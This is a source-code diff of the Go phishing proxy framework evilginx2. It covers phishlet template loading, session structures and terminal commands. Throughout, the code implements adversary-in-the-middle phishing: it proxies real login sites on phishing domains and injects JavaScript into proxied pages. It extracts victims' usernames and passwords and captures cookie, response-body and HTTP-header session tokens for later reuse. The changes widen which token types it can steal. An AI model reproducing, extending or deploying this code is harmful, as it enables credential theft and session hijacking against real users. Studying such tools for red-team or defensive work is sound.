forcePost []ForcePost
|
||||
login LoginUrl
|
||||
js_inject []JsInject
|
||||
customParams map[string]string
|
||||
isTemplate bool
|
||||
}
|
||||
|
||||
type ConfigParam struct {
|
||||
Name string `mapstructure:"name"`
|
||||
Default *string `mapstructure:"default"`
|
||||
Required *bool `mapstructure:"required"`
|
||||
}
|
||||
|
||||
type ConfigProxyHost struct {
|
||||
@ -122,8 +149,13 @@ type ConfigSubFilter struct {
|
||||
}
|
||||
|
||||
type ConfigAuthToken struct {
|
||||
Domain string `mapstructure:"domain"`
|
||||
Keys []string `mapstructure:"keys"`
|
||||
Domain *string `mapstructure:"domain"`
|
||||
Keys *[]string `mapstructure:"keys"`
|
||||
Type *string `mapstructure:"type"`
|
||||
Path *string `mapstructure:"path"`
|
||||
Name *string `mapstructure:"name"`
|
||||
Search *string `mapstructure:"search"`
|
||||
Header *string `mapstructure:"header"`
|
||||
}
|
||||
|
||||
type ConfigPostField struct {
|
||||
@ -169,6 +201,7 @@ type ConfigJsInject struct {
|
||||
|
||||
type ConfigPhishlet struct {
|
||||
Name string `mapstructure:"name"`
|
||||
Params *[]ConfigParam `mapstructure:"params"`
|
||||
ProxyHosts *[]ConfigProxyHost `mapstructure:"proxy_hosts"`
|
||||
SubFilters *[]ConfigSubFilter `mapstructure:"sub_filters"`
|
||||
AuthTokens *[]ConfigAuthToken `mapstructure:"auth_tokens"`
|
||||
@ -180,14 +213,13 @@ type ConfigPhishlet struct {
|
||||
JsInject *[]ConfigJsInject `mapstructure:"js_inject"`
|
||||
}
|
||||
|
||||
func NewPhishlet(site string, path string, cfg *Config) (*Phishlet, error) {
|
||||
func NewPhishlet(site string, path string, customParams *map[string]string, cfg *Config) (*Phishlet, error) {
|
||||
p := &Phishlet{
|
||||
Site: site,
|
||||
cfg: cfg,
|
||||
cfg: cfg,
|
||||
}
|
||||
p.Clear()
|
||||
|
||||
err := p.LoadFromFile(site, path)
|
||||
err := p.LoadFromFile(site, path, customParams)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@ -196,11 +228,14 @@ func NewPhishlet(site string, path string, cfg *Config) (*Phishlet, error) {
|
||||
|
||||
func (p *Phishlet) Clear() {
|
||||
p.Name = ""
|
||||
p.ParentName = ""
|
||||
p.Author = ""
|
||||
p.proxyHosts = []ProxyHost{}
|
||||
p.domains = []string{}
|
||||
p.subfilters = make(map[string][]SubFilter)
|
||||
p.authTokens = make(map[string][]*AuthToken)
|
||||
p.cookieAuthTokens = make(map[string][]*CookieAuthToken)
|
||||
p.bodyAuthTokens = make(map[string]*BodyAuthToken)
|
||||
p.httpAuthTokens = make(map[string]*HttpAuthToken)
|
||||
p.authUrls = []*regexp.Regexp{}
|
||||
p.username.key = nil
|
||||
p.username.search = nil
|
||||
@ -208,9 +243,11 @@ func (p *Phishlet) Clear() {
|
||||
p.password.search = nil
|
||||
p.custom = []PostField{}
|
||||
p.forcePost = []ForcePost{}
|
||||
p.customParams = make(map[string]string)
|
||||
p.isTemplate = false
|
||||
}
|
||||
|
||||
func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[string]string) error {
|
||||
p.Clear()
|
||||
|
||||
c := viper.New()
|
||||
@ -223,6 +260,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
p.Name = site
|
||||
p.Path = path
|
||||
p.ParentName = ""
|
||||
p.Author = c.GetString("author")
|
||||
p.Version, err = p.parseVersion(c.GetString("min_ver"))
|
||||
if err != nil {
|
||||
@ -254,12 +293,68 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return err
|
||||
}
|
||||
|
||||
if fp.Params != nil {
|
||||
if len(*fp.Params) > 0 {
|
||||
p.isTemplate = true
|
||||
}
|
||||
if customParams != nil {
|
||||
prequired := make(map[string]string)
|
||||
pall := make(map[string]string)
|
||||
params := make(map[string]string)
|
||||
for _, param := range *fp.Params {
|
||||
val := ""
|
||||
if param.Default != nil {
|
||||
val = *param.Default
|
||||
}
|
||||
params[param.Name] = val
|
||||
pall[param.Name] = val
|
||||
|
||||
if param.Required != nil && *param.Required == true {
|
||||
prequired[param.Name] = val
|
||||
}
|
||||
}
|
||||
for k, v := range *customParams {
|
||||
if _, ok := pall[k]; !ok {
|
||||
log.Warning("phishlets: [%s] incorrect parameter key specified: %s", site, k)
|
||||
delete(*customParams, k)
|
||||
continue
|
||||
}
|
||||
params[k] = v
|
||||
if _, ok := prequired[k]; ok {
|
||||
delete(prequired, k)
|
||||
}
|
||||
}
|
||||
if len(prequired) > 0 {
|
||||
return fmt.Errorf("missing custom parameter values during initialization: %v", prequired)
|
||||
}
|
||||
p.isTemplate = false
|
||||
p.customParams = params
|
||||
} else {
|
||||
for _, param := range *fp.Params {
|
||||
val := ""
|
||||
if param.Required != nil && *param.Required {
|
||||
val += "(required)"
|
||||
} else if param.Default != nil {
|
||||
val = *param.Default
|
||||
}
|
||||
|
||||
p.customParams[param.Name] = val
|
||||
}
|
||||
}
|
||||
|
||||
/*
|
||||
if customParams != nil {
|
||||
p.customParams = *customParams
|
||||
} else {
|
||||
for _, param := range *fp.Params {
|
||||
p.customParams[param.Name] = param.Default
|
||||
}
|
||||
}*/
|
||||
}
|
||||
|
||||
if fp.ProxyHosts == nil {
|
||||
return fmt.Errorf("missing `proxy_hosts` section")
|
||||
}
|
||||
if fp.SubFilters == nil {
|
||||
return fmt.Errorf("missing `sub_filters` section")
|
||||
}
|
||||
if fp.AuthTokens == nil {
|
||||
return fmt.Errorf("missing `auth_tokens` section")
|
||||
}
|
||||
@ -290,7 +385,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if ph.AutoFilter != nil {
|
||||
auto_filter = *ph.AutoFilter
|
||||
}
|
||||
p.addProxyHost(*ph.PhishSub, *ph.OrigSub, *ph.Domain, ph.Session, ph.IsLanding, auto_filter)
|
||||
p.addProxyHost(p.paramVal(*ph.PhishSub), p.paramVal(*ph.OrigSub), p.paramVal(*ph.Domain), ph.Session, ph.IsLanding, auto_filter)
|
||||
}
|
||||
if len(p.proxyHosts) == 0 {
|
||||
return fmt.Errorf("proxy_hosts: list cannot be empty")
|
||||
@ -316,29 +411,35 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
p.proxyHosts[0].is_landing = true
|
||||
}
|
||||
|
||||
for _, sf := range *fp.SubFilters {
|
||||
if sf.Hostname == nil {
|
||||
return fmt.Errorf("sub_filters: missing `triggers_on` field")
|
||||
if fp.SubFilters != nil {
|
||||
for _, sf := range *fp.SubFilters {
|
||||
if sf.Hostname == nil {
|
||||
return fmt.Errorf("sub_filters: missing `triggers_on` field")
|
||||
}
|
||||
if sf.Sub == nil {
|
||||
return fmt.Errorf("sub_filters: missing `orig_sub` field")
|
||||
}
|
||||
if sf.Domain == nil {
|
||||
return fmt.Errorf("sub_filters: missing `domain` field")
|
||||
}
|
||||
if sf.Mimes == nil {
|
||||
return fmt.Errorf("sub_filters: missing `mimes` field")
|
||||
}
|
||||
if sf.Search == nil {
|
||||
return fmt.Errorf("sub_filters: missing `search` field")
|
||||
}
|
||||
if sf.Replace == nil {
|
||||
return fmt.Errorf("sub_filters: missing `replace` field")
|
||||
}
|
||||
if sf.WithParams == nil {
|
||||
sf.WithParams = &[]string{}
|
||||
}
|
||||
|
||||
for n := range *sf.Mimes {
|
||||
(*sf.Mimes)[n] = p.paramVal((*sf.Mimes)[n])
|
||||
}
|
||||
p.addSubFilter(p.paramVal(*sf.Hostname), p.paramVal(*sf.Sub), p.paramVal(*sf.Domain), *sf.Mimes, p.paramVal(*sf.Search), p.paramVal(*sf.Replace), sf.RedirectOnly, *sf.WithParams)
|
||||
}
|
||||
if sf.Sub == nil {
|
||||
return fmt.Errorf("sub_filters: missing `orig_sub` field")
|
||||
}
|
||||
if sf.Domain == nil {
|
||||
return fmt.Errorf("sub_filters: missing `domain` field")
|
||||
}
|
||||
if sf.Mimes == nil {
|
||||
return fmt.Errorf("sub_filters: missing `mimes` field")
|
||||
}
|
||||
if sf.Search == nil {
|
||||
return fmt.Errorf("sub_filters: missing `search` field")
|
||||
}
|
||||
if sf.Replace == nil {
|
||||
return fmt.Errorf("sub_filters: missing `replace` field")
|
||||
}
|
||||
if sf.WithParams == nil {
|
||||
sf.WithParams = &[]string{}
|
||||
}
|
||||
p.addSubFilter(*sf.Hostname, *sf.Sub, *sf.Domain, *sf.Mimes, *sf.Search, *sf.Replace, sf.RedirectOnly, *sf.WithParams)
|
||||
}
|
||||
if fp.JsInject != nil {
|
||||
for _, js := range *fp.JsInject {
|
||||
@ -351,20 +452,82 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if js.Script == nil {
|
||||
return fmt.Errorf("js_inject: missing `script` field")
|
||||
}
|
||||
err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, *js.Script)
|
||||
for n := range *js.TriggerDomains {
|
||||
(*js.TriggerDomains)[n] = p.paramVal((*js.TriggerDomains)[n])
|
||||
}
|
||||
for n := range *js.TriggerPaths {
|
||||
(*js.TriggerPaths)[n] = p.paramVal((*js.TriggerPaths)[n])
|
||||
}
|
||||
err := p.addJsInject(*js.TriggerDomains, *js.TriggerPaths, js.TriggerParams, p.paramVal(*js.Script))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, at := range *fp.AuthTokens {
|
||||
err := p.addAuthTokens(at.Domain, at.Keys)
|
||||
if err != nil {
|
||||
return err
|
||||
ttype := "cookie"
|
||||
if at.Type != nil {
|
||||
ttype = *at.Type
|
||||
}
|
||||
if !stringExists(ttype, AUTH_TOKEN_TYPES) {
|
||||
return fmt.Errorf("auth_tokens: invalid token type: %s", ttype)
|
||||
}
|
||||
switch ttype {
|
||||
case "cookie":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for cookie auth token")
|
||||
}
|
||||
if at.Keys == nil {
|
||||
return fmt.Errorf("auth_tokens: 'keys' not found for cookie auth token")
|
||||
}
|
||||
|
||||
for n := range *at.Keys {
|
||||
(*at.Keys)[n] = p.paramVal((*at.Keys)[n])
|
||||
}
|
||||
err := p.addCookieAuthTokens(p.paramVal(*at.Domain), *at.Keys)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
case "body":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for body auth token")
|
||||
}
|
||||
if at.Path == nil {
|
||||
return fmt.Errorf("auth_tokens: 'path' not found for body auth token")
|
||||
}
|
||||
if at.Name == nil {
|
||||
return fmt.Errorf("auth_tokens: 'name' not found for body auth token")
|
||||
}
|
||||
if at.Search == nil {
|
||||
return fmt.Errorf("auth_tokens: 'search' not found for body auth token")
|
||||
}
|
||||
|
||||
err := p.addBodyAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
case "http":
|
||||
if at.Domain == nil {
|
||||
return fmt.Errorf("auth_tokens: 'domain' not found for http auth token")
|
||||
}
|
||||
if at.Path == nil {
|
||||
return fmt.Errorf("auth_tokens: 'path' not found for http auth token")
|
||||
}
|
||||
if at.Name == nil {
|
||||
return fmt.Errorf("auth_tokens: 'name' not found for http auth token")
|
||||
}
|
||||
if at.Header == nil {
|
||||
return fmt.Errorf("auth_tokens: 'header' not found for http auth token")
|
||||
}
|
||||
|
||||
err := p.addHttpAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Header))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, au := range fp.AuthUrls {
|
||||
re, err := regexp.Compile(au)
|
||||
re, err := regexp.Compile(p.paramVal(au))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -384,22 +547,22 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("credentials: missing password `search` field")
|
||||
}
|
||||
|
||||
p.username.key, err = regexp.Compile(*fp.Credentials.Username.Key)
|
||||
p.username.key, err = regexp.Compile(p.paramVal(*fp.Credentials.Username.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.username.search, err = regexp.Compile(*fp.Credentials.Username.Search)
|
||||
p.username.search, err = regexp.Compile(p.paramVal(*fp.Credentials.Username.Search))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.password.key, err = regexp.Compile(*fp.Credentials.Password.Key)
|
||||
p.password.key, err = regexp.Compile(p.paramVal(*fp.Credentials.Password.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
|
||||
p.password.search, err = regexp.Compile(*fp.Credentials.Password.Search)
|
||||
p.password.search, err = regexp.Compile(p.paramVal(*fp.Credentials.Password.Search))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
@ -412,8 +575,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if p.password.tp == "" {
|
||||
p.password.tp = "post"
|
||||
}
|
||||
p.username.key_s = *fp.Credentials.Username.Key
|
||||
p.password.key_s = *fp.Credentials.Password.Key
|
||||
p.username.key_s = p.paramVal(*fp.Credentials.Username.Key)
|
||||
p.password.key_s = p.paramVal(*fp.Credentials.Password.Key)
|
||||
|
||||
if fp.LoginItem.Domain == nil {
|
||||
return fmt.Errorf("login: missing `domain` field")
|
||||
@ -421,7 +584,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if fp.LoginItem.Path == nil {
|
||||
return fmt.Errorf("login: missing `path` field")
|
||||
}
|
||||
p.login.domain = *fp.LoginItem.Domain
|
||||
p.login.domain = p.paramVal(*fp.LoginItem.Domain)
|
||||
if p.login.domain == "" {
|
||||
return fmt.Errorf("login: `domain` field cannot be empty")
|
||||
}
|
||||
@ -441,7 +604,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("login: `domain` must contain a value of one of the hostnames (`orig_subdomain` + `domain`) defined in `proxy_hosts` section")
|
||||
}
|
||||
|
||||
p.login.path = *fp.LoginItem.Path
|
||||
p.login.path = p.paramVal(*fp.LoginItem.Path)
|
||||
if p.login.path == "" {
|
||||
p.login.path = "/"
|
||||
}
|
||||
@ -459,11 +622,11 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
return fmt.Errorf("credentials: missing custom `search` field")
|
||||
}
|
||||
o := PostField{}
|
||||
o.key, err = regexp.Compile(*cp.Key)
|
||||
o.key, err = regexp.Compile(p.paramVal(*cp.Key))
|
||||
if err != nil {
|
||||
return fmt.Errorf("credentials: %v", err)
|
||||
}
|
||||
o.search, err = regexp.Compile(*cp.Search)
|
||||
o.search, err = regexp.Compile(p.paramVal(*cp.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -471,7 +634,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
if o.tp == "" {
|
||||
o.tp = "post"
|
||||
}
|
||||
o.key_s = *cp.Key
|
||||
o.key_s = p.paramVal(*cp.Key)
|
||||
p.custom = append(p.custom, o)
|
||||
}
|
||||
}
|
||||
@ -490,7 +653,7 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
fpf := ForcePost{}
|
||||
fpf.path, err = regexp.Compile(*op.Path)
|
||||
fpf.path, err = regexp.Compile(p.paramVal(*op.Path))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -506,11 +669,11 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
f_s := ForcePostSearch{}
|
||||
f_s.key, err = regexp.Compile(*op_s.Key)
|
||||
f_s.key, err = regexp.Compile(p.paramVal(*op_s.Key))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
f_s.search, err = regexp.Compile(*op_s.Search)
|
||||
f_s.search, err = regexp.Compile(p.paramVal(*op_s.Search))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
@ -526,8 +689,8 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
}
|
||||
|
||||
f_f := ForcePostForce{
|
||||
key: *op_f.Key,
|
||||
value: *op_f.Value,
|
||||
key: p.paramVal(*op_f.Key),
|
||||
value: p.paramVal(*op_f.Value),
|
||||
}
|
||||
fpf.force = append(fpf.force, f_f)
|
||||
}
|
||||
@ -537,70 +700,34 @@ func (p *Phishlet) LoadFromFile(site string, path string) error {
|
||||
|
||||
if fp.LandingPath != nil {
|
||||
p.landing_path = *fp.LandingPath
|
||||
for n := range p.landing_path {
|
||||
p.landing_path[n] = p.paramVal(p.landing_path[n])
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) GetPhishHosts() []string {
|
||||
func (p *Phishlet) GetPhishHosts(use_wildcards bool) []string {
|
||||
var ret []string
|
||||
for _, h := range p.proxyHosts {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
if ok {
|
||||
ret = append(ret, combineHost(h.phish_subdomain, phishDomain))
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Name)
|
||||
if ok {
|
||||
if !use_wildcards {
|
||||
for _, h := range p.proxyHosts {
|
||||
ret = append(ret, combineHost(h.phish_subdomain, phishDomain))
|
||||
}
|
||||
} else {
|
||||
ret = []string{"*." + phishDomain}
|
||||
}
|
||||
}
|
||||
return ret
|
||||
}
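GetPhishHosts now takes a use_wildcards flag: false enumerates one phishing hostname per proxy_hosts entry, true collapses them into a single wildcard entry, which fits a wildcard TLS certificate. An illustrative sketch only, with made-up hostnames and p assumed to be a loaded *Phishlet:

// made-up phishlet whose configured phish domain is "phish.example.com"
hosts := p.GetPhishHosts(false) // e.g. ["login.phish.example.com", "www.phish.example.com"]
wild := p.GetPhishHosts(true)   // ["*.phish.example.com"]
_, _ = hosts, wild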
|
||||
|
||||
func (p *Phishlet) GetLandingUrls(redirect_url string, inc_token bool) ([]string, error) {
|
||||
var ret []string
|
||||
host := p.cfg.GetBaseDomain()
|
||||
for _, h := range p.proxyHosts {
|
||||
if h.is_landing {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
if ok {
|
||||
host = combineHost(h.phish_subdomain, phishDomain)
|
||||
}
|
||||
}
|
||||
}
|
||||
b64_param := ""
|
||||
if redirect_url != "" {
|
||||
_, err := url.ParseRequestURI(redirect_url)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
b64_param = base64.URLEncoding.EncodeToString([]byte(redirect_url))
|
||||
}
|
||||
|
||||
for _, u := range p.landing_path {
|
||||
purl := "https://" + host + u
|
||||
if inc_token {
|
||||
sep := "?"
|
||||
for n := len(u) - 1; n >= 0; n-- {
|
||||
switch u[n] {
|
||||
case '/':
|
||||
break
|
||||
case '?':
|
||||
sep = "&"
|
||||
break
|
||||
}
|
||||
}
|
||||
purl += sep + p.cfg.verificationParam + "=" + p.cfg.verificationToken
|
||||
if b64_param != "" {
|
||||
purl += "&" + p.cfg.redirectParam + "=" + url.QueryEscape(b64_param)
|
||||
}
|
||||
}
|
||||
ret = append(ret, purl)
|
||||
}
|
||||
return ret, nil
|
||||
}
|
||||
|
||||
func (p *Phishlet) GetLureUrl(path string) (string, error) {
|
||||
var ret string
|
||||
host := p.cfg.GetBaseDomain()
|
||||
for _, h := range p.proxyHosts {
|
||||
if h.is_landing {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Site)
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(p.Name)
|
||||
if ok {
|
||||
host = combineHost(h.phish_subdomain, phishDomain)
|
||||
}
|
||||
@ -635,7 +762,7 @@ func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[str
|
||||
params_matched := false
|
||||
if params != nil {
|
||||
pcnt := 0
|
||||
for k, _ := range *params {
|
||||
for k := range *params {
|
||||
if stringExists(k, js.trigger_params) {
|
||||
pcnt += 1
|
||||
}
|
||||
@ -665,7 +792,7 @@ func (p *Phishlet) GetScriptInject(hostname string, path string, params *map[str
|
||||
func (p *Phishlet) GenerateTokenSet(tokens map[string]string) map[string]map[string]string {
|
||||
ret := make(map[string]map[string]string)
|
||||
td := make(map[string]string)
|
||||
for domain, tokens := range p.authTokens {
|
||||
for domain, tokens := range p.cookieAuthTokens {
|
||||
ret[domain] = make(map[string]string)
|
||||
for _, t := range tokens {
|
||||
td[t.name] = domain
|
||||
@ -695,23 +822,27 @@ func (p *Phishlet) addSubFilter(hostname string, subdomain string, domain string
hostname = strings.ToLower(hostname)
subdomain = strings.ToLower(subdomain)
domain = strings.ToLower(domain)
for n, _ := range mime {
for n := range mime {
mime[n] = strings.ToLower(mime[n])
}
p.subfilters[hostname] = append(p.subfilters[hostname], SubFilter{subdomain: subdomain, domain: domain, mime: mime, regexp: regexp, replace: replace, redirect_only: redirect_only, with_params: with_params})
}

func (p *Phishlet) addAuthTokens(hostname string, tokens []string) error {
p.authTokens[hostname] = []*AuthToken{}
func (p *Phishlet) addCookieAuthTokens(hostname string, tokens []string) error {
p.cookieAuthTokens[hostname] = []*CookieAuthToken{}
for _, tk := range tokens {
st := strings.Split(tk, ",")
st := strings.Split(tk, ":")
if len(st) == 1 {
st = strings.Split(tk, ",")
}
if len(st) > 0 {
name := st[0]
at := &AuthToken{
at := &CookieAuthToken{
name: name,
re: nil,
http_only: false,
optional: false,
always: false,
}
for i := 1; i < len(st); i++ {
switch st[i] {
@ -723,21 +854,59 @@ func (p *Phishlet) addAuthTokens(hostname string, tokens []string) error {
}
case "opt":
at.optional = true
case "always":
at.always = true
}
}
p.authTokens[hostname] = append(p.authTokens[hostname], at)
p.cookieAuthTokens[hostname] = append(p.cookieAuthTokens[hostname], at)
}
}
return nil
}

func (p *Phishlet) addBodyAuthToken(hostname string, path string, name string, search string) error {
path_re, err := regexp.Compile(path)
if err != nil {
return err
}
search_re, err := regexp.Compile(search)
if err != nil {
return err
}

p.bodyAuthTokens[name] = &BodyAuthToken{
domain: hostname,
path: path_re,
name: name,
search: search_re,
}

return nil
}

func (p *Phishlet) addHttpAuthToken(hostname string, path string, name string, header string) error {
path_re, err := regexp.Compile(path)
if err != nil {
return err
}

p.httpAuthTokens[name] = &HttpAuthToken{
domain: hostname,
path: path_re,
name: name,
header: header,
}

return nil
}

func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string, trigger_params []string, script string) error {
js := JsInject{}
for _, d := range trigger_domains {
js.trigger_domains = append(js.trigger_domains, strings.ToLower(d))
}
for _, d := range trigger_paths {
re, err := regexp.Compile(d)
re, err := regexp.Compile("^" + d + "$")
if err == nil {
js.trigger_paths = append(js.trigger_paths, re)
} else {
@ -762,8 +931,8 @@ func (p *Phishlet) domainExists(domain string) bool {
return false
}

func (p *Phishlet) getAuthToken(domain string, token string) *AuthToken {
if tokens, ok := p.authTokens[domain]; ok {
func (p *Phishlet) getAuthToken(domain string, token string) *CookieAuthToken {
if tokens, ok := p.cookieAuthTokens[domain]; ok {
for _, at := range tokens {
if at.re != nil {
if at.re.MatchString(token) {
@ -831,3 +1000,13 @@ func (p *Phishlet) parseVersion(ver string) (PhishletVersion, error) {
}
return ret, nil
}

func (p *Phishlet) paramVal(s string) string {
var ret string = s
if !p.isTemplate {
for k, v := range p.customParams {
ret = strings.ReplaceAll(ret, "{"+k+"}", v)
}
}
return ret
}
@ -1,41 +1,53 @@
package core

import (
"time"

"github.com/kgretzky/evilginx2/database"
)

type Session struct {
Id string
Name string
Username string
Password string
Custom map[string]string
Params map[string]string
Tokens map[string]map[string]*database.Token
RedirectURL string
IsDone bool
IsAuthUrl bool
IsForwarded bool
RedirectCount int
PhishLure *Lure
Id string
Name string
Username string
Password string
Custom map[string]string
Params map[string]string
BodyTokens map[string]string
HttpTokens map[string]string
CookieTokens map[string]map[string]*database.CookieToken
RedirectURL string
IsDone bool
IsAuthUrl bool
IsForwarded bool
ProgressIndex int
RedirectCount int
PhishLure *Lure
RedirectorName string
LureDirPath string
}

func NewSession(name string) (*Session, error) {
s := &Session{
Id: GenRandomToken(),
Name: name,
Username: "",
Password: "",
Custom: make(map[string]string),
Params: make(map[string]string),
RedirectURL: "",
IsDone: false,
IsAuthUrl: false,
IsForwarded: false,
RedirectCount: 0,
PhishLure: nil,
Id: GenRandomToken(),
Name: name,
Username: "",
Password: "",
Custom: make(map[string]string),
Params: make(map[string]string),
BodyTokens: make(map[string]string),
HttpTokens: make(map[string]string),
RedirectURL: "",
IsDone: false,
IsAuthUrl: false,
IsForwarded: false,
ProgressIndex: 0,
RedirectCount: 0,
PhishLure: nil,
RedirectorName: "",
LureDirPath: "",
}
s.Tokens = make(map[string]map[string]*database.Token)
s.CookieTokens = make(map[string]map[string]*database.CookieToken)

return s, nil
}
@ -52,26 +64,30 @@ func (s *Session) SetCustom(name string, value string) {
s.Custom[name] = value
}

func (s *Session) AddAuthToken(domain string, key string, value string, path string, http_only bool, authTokens map[string][]*AuthToken) bool {
if _, ok := s.Tokens[domain]; !ok {
s.Tokens[domain] = make(map[string]*database.Token)
func (s *Session) AddCookieAuthToken(domain string, key string, value string, path string, http_only bool, expires time.Time) {
if _, ok := s.CookieTokens[domain]; !ok {
s.CookieTokens[domain] = make(map[string]*database.CookieToken)
}
if tk, ok := s.Tokens[domain][key]; ok {

if tk, ok := s.CookieTokens[domain][key]; ok {
tk.Name = key
tk.Value = value
tk.Path = path
tk.HttpOnly = http_only
} else {
s.Tokens[domain][key] = &database.Token{
s.CookieTokens[domain][key] = &database.CookieToken{
Name: key,
Value: value,
HttpOnly: http_only,
}
}

tcopy := make(map[string][]AuthToken)
}

func (s *Session) AllCookieAuthTokensCaptured(authTokens map[string][]*CookieAuthToken) bool {
tcopy := make(map[string][]CookieAuthToken)
for k, v := range authTokens {
tcopy[k] = []AuthToken{}
tcopy[k] = []CookieAuthToken{}
for _, at := range v {
if !at.optional {
tcopy[k] = append(tcopy[k], *at)
@ -79,8 +95,8 @@ func (s *Session) AddAuthToken(domain string, key string, value string, path str
}
}

for domain, tokens := range s.Tokens {
for tk, _ := range tokens {
for domain, tokens := range s.CookieTokens {
for tk := range tokens {
if al, ok := tcopy[domain]; ok {
for an, at := range al {
match := false
@ -1,5 +1,7 @@
package core

import "strings"

func combineHost(sub string, domain string) string {
if sub == "" {
return domain
@ -7,6 +9,14 @@ func combineHost(sub string, domain string) string {
return sub + "." + domain
}

func obfuscateDots(s string) string {
return strings.Replace(s, ".", "[[d0t]]", -1)
}

func removeObfuscatedDots(s string) string {
return strings.Replace(s, "[[d0t]]", ".", -1)
}

func stringExists(s string, sa []string) bool {
for _, k := range sa {
if s == k {
@ -148,7 +148,7 @@ func AsRows(keys []string, vals []string) string {
clr := color.New(color.FgHiBlack)
mLen := maxLen(keys)
var table string
for i, _ := range keys {
for i := range keys {
table += clr.Sprintf(" %s : ", padded(keys[i], mLen, AlignLeft)) + fmt.Sprintf("%s\n", vals[i])
}
return table
@ -157,7 +157,7 @@ func AsRows(keys []string, vals []string) string {
func AsDescription(keys []string, vals []string) string {
clr := color.New(color.FgHiBlack)
var table string
for i, _ := range keys {
for i := range keys {
table += clr.Sprintf(" %s", keys[i]) + fmt.Sprintf("\n %s\n", vals[i])
}
return table

446
core/terminal.go
@ -14,6 +14,7 @@ import (
"os"
"path/filepath"
"regexp"
"sort"
"strconv"
"strings"
"time"
@ -54,16 +55,7 @@ func NewTerminal(p *HttpProxy, cfg *Config, crt_db *CertDb, db *database.Databas

t.createHelp()
t.completer = t.hlp.GetPrefixCompleter(LAYER_TOP)
/*
t.completer = readline.NewPrefixCompleter(
readline.PcItem("server"),
readline.PcItem("ip"),
readline.PcItem("status"),
readline.PcItem("phishlet", readline.PcItem("show"), readline.PcItem("enable"), readline.PcItem("disable"), readline.PcItem("hostname"), readline.PcItem("url")),
readline.PcItem("sessions", readline.PcItem("delete", readline.PcItem("all"))),
readline.PcItem("exit"),
)
*/

t.rl, err = readline.NewEx(&readline.Config{
Prompt: DEFAULT_PROMPT,
AutoComplete: t.completer,
@ -93,8 +85,7 @@ func (t *Terminal) DoWork() {
log.SetReadline(t.rl)

t.cfg.refreshActiveHostnames()
t.updatePhishletCertificates("")
t.updateLuresCertificates()
t.manageCertificates(true)

t.output("%s", t.sprintPhishletStatus(""))

@ -161,6 +152,9 @@ func (t *Terminal) DoWork() {
if err != nil {
log.Error("blacklist: %v", err)
}
case "test-certs":
cmd_ok = true
t.manageCertificates(true)
case "help":
cmd_ok = true
if len(args) == 2 {
@ -187,8 +181,8 @@ func (t *Terminal) DoWork() {
|
||||
func (t *Terminal) handleConfig(args []string) error {
|
||||
pn := len(args)
|
||||
if pn == 0 {
|
||||
keys := []string{"domain", "ip", "redirect_key", "verification_key", "verification_token", "redirect_url"}
|
||||
vals := []string{t.cfg.baseDomain, t.cfg.serverIP, t.cfg.redirectParam, t.cfg.verificationParam, t.cfg.verificationToken, t.cfg.redirectUrl}
|
||||
keys := []string{"domain", "ipv4", "https_port", "dns_port", "redirect_url"}
|
||||
vals := []string{t.cfg.general.Domain, t.cfg.general.Ipv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.RedirectUrl}
|
||||
log.Printf("\n%s\n", AsRows(keys, vals))
|
||||
return nil
|
||||
} else if pn == 2 {
|
||||
@ -196,22 +190,11 @@ func (t *Terminal) handleConfig(args []string) error {
|
